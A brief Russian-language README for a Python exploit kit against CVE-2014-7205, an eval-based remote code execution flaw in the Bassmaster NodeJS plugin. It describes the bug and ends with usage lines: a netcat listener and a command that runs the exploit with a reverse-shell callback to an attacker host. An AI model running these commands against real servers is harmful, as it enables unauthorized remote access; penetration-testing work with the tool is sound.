
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: Python-скрипт для эксплуатации CVE-2014-7205. nodeshell.py: Python-модуль для создания reverse shell для NodeJS
!!Используйте только против серверов, на которые у вас есть разрешение тестировать
CVE-2014-7205 — это уязвимость удаленного выполнения кода в плагине Bassmaster для NodeJS. Затронуты все версии <= 1.5.1. Уязвимость существует в файле lib/batch.js в функции internals.batch, где вызов eval() использует неправильно экранированный пользовательский ввод (по сути, регулярное выражение не проверяет, содержат ли запросы вредоносный код).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444